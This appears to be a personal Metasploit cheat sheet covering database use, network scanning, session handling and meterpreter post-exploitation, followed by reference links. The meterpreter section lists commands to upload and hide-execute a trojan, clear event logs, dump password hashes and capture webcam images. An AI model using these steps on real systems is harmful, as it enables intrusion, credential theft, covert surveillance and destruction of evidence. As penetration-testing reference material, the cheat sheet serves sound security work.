OPERATING METASPLOIT

as root otherwise you cannot scan UDP from within the framework

Usage & database

tail -n0 -F /var/log/* /var/log/*/* /var/lib/postgresql/logfile

screen -S msf
msfconsole -q
db_status
show nops

workspace -h
workspace -v

db_nmap -Pn -sTV -A -T4 x.x.x.x/24
#-sTUV
#[*] Nmap: 'You requested a scan type which requires root privileges.'
#-sS -n -v
hosts
hosts -c address,os_name,os_flavor
hosts -S Linux

use auxiliary/scanner/portscan/tcp
show options
hosts -S Linux -R #--> goes as RHOSTS
run

services
services -c name,info
services -c info,name -p 445
services -c port,proto,state -p 80,443

Sessions

sessions -h
sessions -v

rename a session

sessions -n SESSION-NAME -i 1

interact with it

sessions -i 1

kill a session

sessions -k 1

kill all sessions

sessions -K

meterpreter

background
sessions -i 1

cd / pwd
lcd / lpwd
ls
cat
edit edit.txt

getuid
upload evil_trojan.exe c:\\windows\\system32
execute -f evil_trojan.exe -i -H

clearev
download c:\\boot.ini
run post/windows/gather/hashdump
idletime
ipconfig

run post/windows/manage/migrate
ps
search -f autoexec.bat
shell
webcam_list
webcam_snap -i 1 -v false

Resources

usage

Using Metasploit https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

MSFconsole Commands https://www.offensive-security.com/metasploit-unleashed/msfconsole-commands/

Metasploit Console: my own cheatsheet https://www.andreafortuna.org/2017/12/11/metasploit-console-my-own-cheatsheet/

Vulnerability & Exploit Database https://www.rapid7.com/db/modules/

Metasploit Basics – Part 4: Exploit and Attack Example http://www.digitalbond.com/blog/2010/07/14/metasploit-basics-%E2%80%93-part-4-exploit-and-attack-example/

rhosts on file

Metasploit set rhosts file http://travisaltman.com/metasploit-set-rhosts-file/

meterpreter

METERPRETER BASIC COMMANDS https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

sessions

Sessions Command in Metasploit https://www.hackingarticles.in/sessions-command-metasploit/

database

USING THE DATABASE IN METASPLOIT https://www.offensive-security.com/metasploit-unleashed/using-databases/

write your own

How to get started with writing an exploit https://github.com/rapid7/metasploit-framework/wiki/How-to-get-started-with-writing-an-exploit

How to write a browser exploit using BrowserExploitServer https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-browser-exploit-using-BrowserExploitServer


HOME | GUIDES | BENCHMARKS | html